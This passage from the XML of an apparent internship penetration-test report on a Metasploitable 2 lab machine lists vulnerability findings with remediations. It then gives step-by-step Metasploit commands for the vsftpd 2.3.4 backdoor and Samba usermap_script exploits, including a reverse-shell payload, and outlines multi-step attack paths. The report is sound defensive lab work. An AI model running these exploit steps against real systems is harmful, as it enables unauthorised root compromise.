              <w:t>Disable anonymous FTP access in /etc/vsftpd.conf: anonymous_enable=NO. Restart vsftpd service.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The FTP server permits anonymous authentication, allowing any unauthenticated user to connect and browse accessible directories. In combination with write permissions this can allow malicious file uploads.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[HIGH] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>V-004 — Telnet Service Active — Cleartext Protocol</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>23/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>7.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Port 23 open. Wireshark capture confirmed cleartext credential transmission in lab.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Disable Telnet (systemctl disable telnet). Deploy SSH for all remote administration.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Telnet transmits all data, including usernames, passwords, and commands, in plaintext. Any attacker with the ability to intercept network traffic (e.g., via ARP spoofing or a compromised switch) can trivially capture credentials.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[MEDIUM] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>V-005 — Outdated OpenSSH Version (4.7p1)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>22/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE-2018-15473, CVE-2016-10009</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>5.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>SSH banner: SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1. Current stable: OpenSSH 9.8.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Upgrade OpenSSH to latest stable. Configure AllowAlgorithms to exclude weak ciphers/MACs.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>OpenSSH 4.7p1 (2007) is severely outdated and affected by multiple CVEs. CVE-2018-15473 enables username enumeration via timing side-channel. Weak cipher suites may be negotiable, degrading session security.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="4472C4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">[LOW] </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>V-006 — HTTP Server Version Disclosure</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>80/tcp</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>N/A</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>CVSS Score</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>3.1</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HTTP HEAD / response header: Server: Apache/2.2.8 (Ubuntu) DAV/2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4680"/>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Set 'ServerTokens Prod' and 'ServerSignature Off' in Apache configuration. Restart httpd.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="160"/>
        <w:ind w:left="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The Apache HTTP server returns full version information in the Server response header (Apache/2.2.8 Ubuntu DAV/2). This facilitates targeted exploitation by revealing the exact software version to potential attackers.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F497D"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>6. Exploitation Methodology (Lab Demonstration)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The following exploitation steps were performed exclusively in the lab environment against Metasploitable 2 with explicit authorisation. No real systems were targeted.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.1 FTP Backdoor Exploitation (CVE-2011-2523)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Launch Metasploit: msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Select module: use exploit/unix/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Set target: set RHOSTS 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Execute: run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Result: Shell opened on port 6200 — uid=0(root) gid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.2 SMB Username Map Script Exploitation (CVE-2007-2447)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Select module: use exploit/multi/samba/usermap_script</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Set target: set RHOSTS 192.168.56.101</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Set payload: set PAYLOAD cmd/unix/reverse</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Set listener: set LHOST 192.168.56.102</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Execute: run</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Result: Command shell session opened — id returned uid=0(root)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>6.3 Anonymous FTP Access</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Using Netcat: nc 192.168.56.101 21 followed by USER anonymous and PASS anonymous@example.com resulted in a successful 230 Login successful response. Directory listing via PASV and LIST revealed /pub directory contents.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F497D"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>7. Attack Path Analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The following attack chains represent realistic multi-step exploitation scenarios an attacker could execute against this target given the identified vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Path A: FTP Backdoor → Root Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Attacker connects to FTP port 21.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Triggers vsFTPd 2.3.4 backdoor via malformed username.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bind shell opens on port 6200 as root.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Full system compromise achieved in under 30 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Path B: SMB RCE → Root Shell</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Attacker enumerates port 445 (Samba 3.0.20 detected).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Selects Metasploit module for CVE-2007-2447.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Injects shell metacharacters via MS-RPC username.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Reverse shell received as root — complete host takeover.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Path C: Anonymous FTP → Credential Harvest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Attacker authenticates anonymously to FTP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Downloads configuration files or backup archives from /pub.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Extracts credentials or sensitive data from retrieved files.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Uses credentials for lateral movement within network.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Path D: HTTP → WebApp Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Attacker identifies /mutillidae and /dvwa via path probing.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Exploits SQLi or command injection in exposed web applications.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Achieves server-side code execution via web shell upload.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
        <w:spacing w:after="60"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Escalates privileges via local kernel exploit.</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="360" w:after="120"/>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="1F497D"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>8. Tool Development — NetScout v1.0</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>As part of the internship tool development requirement, NetScout was built — a Python 3 network enumeration and security assessment tool using only the standard library.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
